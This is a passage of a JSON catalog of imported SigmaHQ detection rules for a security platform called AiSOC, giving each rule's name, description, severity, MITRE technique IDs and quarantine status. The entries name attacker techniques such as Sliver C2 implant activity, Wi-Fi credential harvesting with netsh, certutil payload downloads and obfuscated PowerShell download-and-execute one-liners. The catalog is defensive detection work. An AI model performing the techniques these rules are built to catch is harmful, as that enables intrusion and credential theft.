"df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_exploit_guard_susp_allowed_apps.yml" } }, { "id": "sigmahq-sigma-42333b2c-b425-441c-b70e-99404a17170f", "type": "detection", "name": "HackTool - Sliver C2 Implant Activity Pattern", "description": "Detects process activity patterns as seen being used by Sliver C2 framework implants", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-sliver-c2-implant-activity-pattern.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "42333b2c-b425-441c-b70e-99404a17170f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_sliver_c2_execution_pattern.yml" } }, { "id": "sigmahq-sigma-424273ea-7cf8-43a6-b712-375f925e481f", "type": "detection", "name": "Scheduled Task Executed From A Suspicious Location", "description": "Detects the execution of Scheduled Tasks where the Program being run is located in a suspicious location or it's an unusale program to be run from a Scheduled Task", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/scheduled-task-executed-from-a-suspicious-location.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "424273ea-7cf8-43a6-b712-375f925e481f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/taskscheduler/win_taskscheduler_execution_from_susp_locations.yml" } }, { "id": "sigmahq-sigma-4281cb20-2994-4580-aa63-c8b86d019934", "type": "detection", "name": "Hiding Files with Attrib.exe", "description": "Detects usage of attrib.exe to hide files from users.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1564.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hiding-files-with-attrib-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4281cb20-2994-4580-aa63-c8b86d019934", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_attrib_hiding_files.yml" } }, { "id": "sigmahq-sigma-42821614-9264-4761-acfc-5772c3286f76", "type": "detection", "name": "Root Certificate Installed - PowerShell", "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1553.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/root-certificate-installed-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "42821614-9264-4761-acfc-5772c3286f76", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_root_certificate_installed.yml" } }, { "id": "sigmahq-sigma-42a5f1e7-9603-4f6d-97ae-3f37d130d794", "type": "detection", "name": "Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE", "description": "Detects the execution of certutil with certain flags that allow the utility to download files from file-sharing websites.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-file-downloaded-from-file-sharing-website-via-certutil-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "42a5f1e7-9603-4f6d-97ae-3f37d130d794", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_certutil_download_file_sharing_domains.yml" } }, { "id": "sigmahq-sigma-42a993dd-bb3e-48c8-b372-4d6684c4106c", "type": "detection", "name": "HackTool - CrackMapExec Execution", "description": "This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1047", "T1053", "T1059.003", "T1059.001", "T1110", "T1201" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-crackmapexec-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "42a993dd-bb3e-48c8-b372-4d6684c4106c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_crackmapexec_execution.yml" } }, { "id": "sigmahq-sigma-42b1a5b8-353f-4f10-b256-39de4467faff", "type": "detection", "name": "Harvesting Of Wifi Credentials Via Netsh.EXE", "description": "Detect the harvesting of wifi credentials using netsh.exe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1040" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/harvesting-of-wifi-credentials-via-netsh-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "42b1a5b8-353f-4f10-b256-39de4467faff", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_netsh_wifi_credential_harvesting.yml" } }, { "id": "sigmahq-sigma-42c575ea-e41e-41f1-b248-8093c3e82a28", "type": "detection", "name": "PsExec Service Installation", "description": "Detects PsExec service installation and execution events", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/psexec-service-installation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "42c575ea-e41e-41f1-b248-8093c3e82a28", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/service_control_manager/win_system_service_install_sysinternals_psexec.yml" } }, { "id": "sigmahq-sigma-42ccce6d-7bd3-4930-95cd-e4d83fa94a30", "type": "detection", "name": "Bitbucket Project Secret Scanning Allowlist Added", "description": "Detects when a secret scanning allowlist rule is added for projects.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/bitbucket-project-secret-scanning-allowlist-added.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "42ccce6d-7bd3-4930-95cd-e4d83fa94a30", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/bitbucket/audit/bitbucket_audit_project_secret_scanning_allowlist_added.yml" } }, { "id": "sigmahq-sigma-42d36aa1-3240-4db0-8257-e0118dcdd9cd", "type": "detection", "name": "Suspicious Hyper-V Cmdlets", "description": "Adversaries may carry out malicious operations using a virtual instance to avoid detection", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1564.006" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-hyper-v-cmdlets.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "42d36aa1-3240-4db0-8257-e0118dcdd9cd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_hyper_v_condlet.yml" } }, { "id": "sigmahq-sigma-42df45e7-e6e9-43b5-8f26-bec5b39cc239", "type": "detection", "name": "System Information Discovery", "description": "Detects system information discovery commands", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "endpoint", "mitre_techniques": [ "T1082" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/system-information-discovery.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "42df45e7-e6e9-43b5-8f26-bec5b39cc239", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_system_info_discovery.yml" } }, { "id": "sigmahq-sigma-43103702-5886-11ed-9b6a-0242ac120002", "type": "detection", "name": "Suspicious Vsls-Agent Command With AgentExtensionPath Load", "description": "Detects Microsoft Visual Studio vsls-agent.exe lolbin execution with a suspicious library load using the --agentExtensionPath parameter", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-vsls-agent-command-with-agentextensionpath-load.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "43103702-5886-11ed-9b6a-0242ac120002", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_vslsagent_agentextensionpath_load.yml" } }, { "id": "sigmahq-sigma-431a1fdb-4799-4f3b-91c3-a683b003fc49", "type": "detection", "name": "New Kernel Driver Via SC.EXE", "description": "Detects creation of a new service (kernel driver) with the type \"kernel\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1543.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-kernel-driver-via-sc-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "431a1fdb-4799-4f3b-91c3-a683b003fc49", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sc_new_kernel_driver.yml" } }, { "id": "sigmahq-sigma-434c08ba-8406-4d15-8b24-782cb071a691", "type": "detection", "name": "PowerShell Execution With Potential Decryption Capabilities", "description": "Detects PowerShell commands that decrypt an \".LNK\" \"file to drop the next stage of the malware.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-execution-with-potential-decryption-capabilities.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "434c08ba-8406-4d15-8b24-782cb071a691", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_decrypt_pattern.yml" } }, { "id": "sigmahq-sigma-4358e5a5-7542-4dcb-b9f3-87667371839b", "type": "detection", "name": "ISO or Image Mount Indicator in Recent Files", "description": "Detects the creation of recent element file that points to an .ISO, .IMG, .VHD or .VHDX file as often used in phishing attacks.\nThis can be a false positive on server systems but on workstations users should rarely mount .iso or .img files.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/iso-or-image-mount-indicator-in-recent-files.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4358e5a5-7542-4dcb-b9f3-87667371839b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_iso_file_recent.yml" } }, { "id": "sigmahq-sigma-435e10e4-992a-4281-96f3-38b11106adde", "type": "detection", "name": "Computer Discovery And Export Via Get-ADComputer Cmdlet", "description": "Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1033" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/computer-discovery-and-export-via-get-adcomputer-cmdlet.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "435e10e4-992a-4281-96f3-38b11106adde", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_computer_discovery_get_adcomputer.yml" } }, { "id": "sigmahq-sigma-4368354e-1797-463c-bc39-a309effbe8d7", "type": "detection", "name": "Powershell Add Name Resolution Policy Table Rule", "description": "Detects powershell scripts that adds a Name Resolution Policy Table (NRPT) rule for the specified namespace.\nThis will bypass the default DNS server and uses a specified server for answering the query.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1565" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-add-name-resolution-policy-table-rule.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4368354e-1797-463c-bc39-a309effbe8d7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml" } }, { "id": "sigmahq-sigma-438025f9-5856-4663-83f7-52f878a70a50", "type": "detection", "name": "Suspicious Microsoft Office Child Process", "description": "Detects a suspicious process spawning from one of the Microsoft Office suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1047", "T1204.002", "T1218.010" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-microsoft-office-child-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "438025f9-5856-4663-83f7-52f878a70a50", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_office_susp_child_processes.yml" } }, { "id": "sigmahq-sigma-439957a7-ad86-4a8f-9705-a28131c6821b", "type": "detection", "name": "Old TLS1.0/TLS1.1 Protocol Version Enabled", "description": "Detects applications or users re-enabling old TLS versions by setting the \"Enabled\" value to \"1\" for the \"Protocols\" registry key.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/old-tls1-0-tls1-1-protocol-version-enabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "439957a7-ad86-4a8f-9705-a28131c6821b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_tls_protocol_old_version_enabled.yml" } }, { "id": "sigmahq-sigma-43d91656-a9b2-4541-b7e2-6a9bd3a13f4e", "type": "detection", "name": "DSInternals Suspicious PowerShell Cmdlets", "description": "Detects execution and usage of the DSInternals PowerShell module. Which can be used to perform what might be considered as suspicious activity such as dumping DPAPI backup keys or manipulating NTDS.DIT files.\nThe DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory. These include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dsinternals-suspicious-powershell-cmdlets.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "43d91656-a9b2-4541-b7e2-6a9bd3a13f4e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_dsinternals_cmdlets.yml" } }, { "id": "sigmahq-sigma-43e26eb5-cd58-48d1-8ce9-a273f5d298d8", "type": "detection", "name": "Potential Container Discovery Via Inodes Listing", "description": "Detects listing of the inodes of the \"/\" directory to determine if the we are running inside of a container.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1082" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-container-discovery-via-inodes-listing.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "43e26eb5-cd58-48d1-8ce9-a273f5d298d8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_susp_inod_listing.yml" } }, { "id": "sigmahq-sigma-43e32da2-fdd0-4156-90de-50dfd62636f9", "type": "detection", "name": "Dism Remove Online Package", "description": "Deployment Image Servicing and Management tool. DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dism-remove-online-package.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "43e32da2-fdd0-4156-90de-50dfd62636f9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_dism_remove.yml" } }, { "id": "sigmahq-sigma-43fa5350-db63-4b8f-9a01-789a427074e1", "type": "detection", "name": "Potential Obfuscated Ordinal Call Via Rundll32", "description": "Detects execution of \"rundll32\" with potential obfuscated ordinal calls", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1027.010" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-obfuscated-ordinal-call-via-rundll32.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "43fa5350-db63-4b8f-9a01-789a427074e1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_rundll32_obfuscated_ordinal_call.yml" } }, { "id": "sigmahq-sigma-44030449-b0df-4c94-aae1-502359ab28ee", "type": "detection", "name": "PUA - TruffleHog Execution", "description": "Detects execution of TruffleHog, a tool used to search for secrets in different platforms like Git, Jira, Slack, SharePoint, etc. that could be used maliciously.\nWhile it is a legitimate tool, intended for use in CI pipelines and security assessments,\nIt was observed in the Shai-Hulud malware campaign targeting npm packages to steal sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1083", "T1552.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-trufflehog-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "44030449-b0df-4c94-aae1-502359ab28ee", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pua_trufflehog.yml" } }, { "id": "sigmahq-sigma-44143844-0631-49ab-97a0-96387d6b2d7c", "type": "detection", "name": "File Download Using Notepad++ GUP Utility", "description": "Detects execution of the Notepad++ updater (gup) from a process other than Notepad++ to download files.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/file-download-using-notepad-gup-utility.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "44143844-0631-49ab-97a0-96387d6b2d7c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_gup_download.yml" } }, { "id": "sigmahq-sigma-4480827a-9799-4232-b2c4-ccc6c4e9e12b", "type": "detection", "name": "Suspicious CertReq Command to Download", "description": "Detects a suspicious CertReq execution downloading a file.\nThis behavior is often used by attackers to download additional payloads or configuration files.\nCertreq is a built-in Windows utility used to request and retrieve certificates from a certification authority (CA). However, it can be abused by threat actors for malicious purposes.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-certreq-command-to-download.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4480827a-9799-4232-b2c4-ccc6c4e9e12b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_certreq_download.yml" } }, { "id": "sigmahq-sigma-448fd1ea-2116-4c62-9cde-a92d120e0f08", "type": "detection", "name": "Azure Service Principal Removed", "description": "Identifies when a service principal was removed in Azure.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-service-principal-removed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "448fd1ea-2116-4c62-9cde-a92d120e0f08", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/activity_logs/azure_service_principal_removed.yml" } }, { "id": "sigmahq-sigma-44a22d59-b175-4f13-8c16-cbaef5b581ff", "type": "detection", "name": "New File Association Using Exefile", "description": "Detects the abuse of the exefile handler in new file association. Used for bypass of security products.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-file-association-using-exefile.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "44a22d59-b175-4f13-8c16-cbaef5b581ff", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_file_association_exefile.yml" } }, { "id": "sigmahq-sigma-44e24481-6202-4c62-9127-5a0ae8e3fe3d", "type": "detection", "name": "Obfuscated PowerShell OneLiner Execution", "description": "Detects the execution of a specific OneLiner to download and execute powershell modules in memory.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/obfuscated-powershell-oneliner-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "44e24481-6202-4c62-9127-5a0ae8e3fe3d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_download_cradle_obfuscated.yml" } }, { "id": "sigmahq-sigma-4508a70e-97ef-4300-b62b-ff27992990ea", "type": "detection", "name": "DotNet CLR DLL Loaded By Scripting Applications", "description": "Detects .NET CLR DLLs being loaded by scripting applications such as wscript or cscript. This could be an indication of potential suspicious execution.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1055" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dotnet-clr-dll-loaded-by-scripting-applications.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4508a70e-97ef-4300-b62b-ff27992990ea", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_susp_script_dotnet_clr_dll_load.yml" } }, { "id": "sigmahq-sigma-45239e6a-b035-4aaf-b339-8ad379fcb67e", "type": "detection", "name": "Process Proxy Execution Via Squirrel.EXE", "description": "Detects the usage of the \"Squirrel.exe\" binary to execute arbitrary processes. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, 